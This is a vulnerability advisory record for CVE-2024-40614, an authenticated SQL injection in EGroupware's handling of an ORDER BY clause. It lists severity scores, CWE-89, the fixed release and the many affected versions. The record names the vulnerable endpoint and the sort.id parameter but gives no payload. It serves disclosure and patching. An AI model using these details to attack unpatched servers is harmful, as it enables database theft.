GHSA-phg7-8mm9-gj88

Source

https://github.com/advisories/GHSA-phg7-8mm9-gj88

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-phg7-8mm9-gj88/GHSA-phg7-8mm9-gj88.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-phg7-8mm9-gj88

Aliases

CVE-2024-40614

Published

2024-07-07T15:31:12Z

Modified

2024-11-28T05:39:23.928893Z

Severity

6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator

Summary

EGroupware mishandles an ORDER BY clause

Details

EGroupware before 23.1.20240624 mishandles an ORDER BY clause. This leads to json.php menuaction=EGroupware\Api\Etemplate\Widget\Nextmatch::ajaxgetrows sort.id SQL injection by authenticated users for Address Book or InfoLog sorting.

Database specific

{
    "nvd_published_at": "2024-07-07T15:15:09Z",
    "cwe_ids": [
        "CWE-89"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-08T15:00:36Z"
}

References

Affected packages

Packagist / egroupware/egroupware

Package

Name: egroupware/egroupware
Purl: pkg:composer/egroupware/egroupware

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

23.1.20240624

Affected versions

14.*

14.2.20150121

14.2.20150206

14.2.20150210

14.2.20150212

14.2.20150218

14.2.20150310

14.2.20150402

14.2.20150421

14.2.20150428

14.2.20150429

14.2.20150501

14.2.20150603

14.2.20150707

14.2.20150717

14.3.20150728

14.3.20150729

14.3.20150811

14.3.20150821

14.3.20150826

14.3.20150908

14.3.20151012

14.3.20151027

14.3.20151028

14.3.20151029

14.3.20151030

14.3.20151110

14.3.20151130

14.3.20151201

14.3.20160112

14.3.20160113

14.3.20160304

14.3.20160428

14.3.20160512

14.3.20160522

14.3.20160524

14.3.20160525

14.3.20160708

16.*

16.1.20160603

16.1.20160621

16.1.20160627

16.1.20160630

16.1.20160708

16.1.20160715

16.1.20160801

16.1.20160810

16.1.20160905

16.1.20161006

16.1.20161102

16.1.20161107

16.1.20161208

16.1.20170118

16.1.20170203

16.1.20170315

16.1.20170415

16.1.20170612

16.1.20170613

16.1.20170703

16.1.20170922

16.1.20171106

16.1.20180116

16.1.20180130

17.*

17.1.20171023

17.1.20171106

17.1.20171115

17.1.20171129

17.1.20171130

17.1.20171218

17.1.20180118

17.1.20180130

17.1.20180209

17.1.20180321

17.1.20180413

17.1.20180523

17.1.20180625

17.1.20180720

17.1.20180831

17.1.20181018

17.1.20181204

17.1.20181205

17.1.20190111

17.1.20190214

17.1.20190222

17.1.20190402

17.1.20190529

17.1.20190808

19.*

19.1.20190716

19.1.20190717

19.1.20190726

19.1.20190806

19.1.20190813

19.1.20190822

19.1.20190917

19.1.20190925

19.1.20191031

19.1.20191119

19.1.20191220

19.1.20200130

19.1.20200318

19.1.20200409

19.1.20200430

19.1.20200605

19.1.20200701

20.*

20.1.20200525

20.1.20200613

20.1.20200628

20.1.20200710

20.1.20200716

20.1.20200728

20.1.20200731

20.1.20200810

20.1.20200812

20.1.20200818

20.1.20200901

20.1.20200914

20.1.20201005

20.1.20201020

20.1.20201028

20.1.20201202

20.1.20201217

20.1.20210125

20.1.20210324

20.1.20210503

21.*

21.1.20210318

21.1.20210329

21.1.20210406

21.1.20210420

21.1.20210504

21.1.20210521

21.1.20210629

21.1.20210723

21.1.20210923

21.1.20211130

21.1.20220207

21.1.20220406

21.1.20220408

21.1.20220905

21.1.20220916

21.1.20221202

21.1.20230210

22.*

22.1.20220920

23.*

23.1.20230110

23.1.20230114

23.1.20230125

23.1.20230210

23.1.20230228

23.1.20230314

23.1.20230328

23.1.20230412

23.1.20230428

23.1.20230503

23.1.20230524

23.1.20230620

23.1.20230726

23.1.20230728

23.1.20230824

23.1.20230911

23.1.20231110

23.1.20231122

23.1.20231129

23.1.20231201

23.1.20231219

23.1.20231220

23.1.20240125

23.1.20240304

23.1.20240430